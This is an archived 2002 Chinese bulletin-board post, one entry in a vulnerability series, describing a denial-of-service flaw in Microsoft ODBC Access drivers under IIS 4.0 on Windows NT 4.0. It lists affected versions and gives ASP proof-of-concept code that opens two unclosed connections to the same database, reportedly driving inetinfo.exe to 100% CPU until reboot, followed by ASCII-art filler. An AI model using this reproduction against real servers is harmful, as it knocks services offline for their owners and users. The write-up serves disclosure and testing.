发信人: r_hayes(Hayes)
整理人: qcrsoft(2002-02-25 09:24:04), 站内信件
|
18、MS ODBC数据库连接溢出导致NT/9x拒绝服务攻击
漏 洞 描 述:
Microsoft ODBC数据库在连接和断开时可能存在潜在的溢出问题(Microsoft ACCESS数据库相关)。
如果不取消连接而直接和第二个数据库相连接,可能导致服务停止。
影响系统:
ODBC 版本: 3.510.3711.0
ODBC Access驱动版本: 3.51.1029.00
OS 版本: Windows NT 4.0 Service Pack 5, IIS 4.0 (i386)
Microsoft Office 97 Professional (MSO97.dll: 8.0.0.3507)
漏洞检测方法如下:
ODBC 连接源名称: miscdb
ODBC 数据库型号: MS Access
ODBC 假设路径: d:.mdb
ASP代码如下:
<%
set connVB = server.createobject("ADODB.Connection")
connVB.open "DRIVER={Microsoft Access Driver (*.mdb)}; DSN=miscdb"
%>
<html>
<body>
...lots of html removed...
<!-- We Connect to DB1 -->
<%
set connGlobal = server.createobject("ADODB.Connection")
connGlobal.Open "DSN=miscdb;User=sa"
mSQL = "arb SQL Statement"
set rsGlobal = connGlobal.execute(mSQL)
While not rsGlobal.eof
Response.Write rsGlobal("resultfrommiscdb")
rsGlobal.movenext
wend
'rsGlobal.close
'set rsGlobal = nothing
'connGlobal.close
'set connGlobal = nothing
' Note we do NOT close the connection
%>
<!-- Call the same database by means of DBQ direct file access -->
<%
set connGlobal = server.createobject("ADODB.Connection")
connGlobal.Open "DRIVER={Microsoft Access Driver (*.mdb)};
DBQ=d:.mdb"
mSQL = "arb SQL Statement"
set rsGlobal = connGlobal.execute(mSQL)
While not rsGlobal.eof
Response.Write rsGlobal("resultfrommiscdb")
rsGlobal.movenext
wend
rsGlobal.close
set rsGlobal = nothing
connGlobal.close
set connGlobal = nothing
' Note we DO close the connection
%>
在这种情况下,IIS处理进程将会停顿,CPU使用率由于inetinfo.exe进程将达到100%。只有重新启动计算机才能恢复。
----
灌灌
灌灌
灌灌
灌灌 灌灌
灌灌 灌灌灌
灌灌灌灌灌灌灌 灌灌 灌灌灌
灌灌灌灌灌灌灌灌灌灌灌灌
灌灌灌灌灌灌
灌灌灌灌灌灌灌
灌灌 灌灌 灌灌
灌灌 灌灌 灌灌
灌灌 灌灌 灌灌
灌灌 灌灌 灌灌灌
灌灌 灌灌 灌灌灌灌
灌灌 灌灌 灌灌灌灌灌
灌灌 灌灌 灌灌灌灌灌
灌灌 灌灌 灌灌
灌灌灌灌
灌灌灌
灌 |
|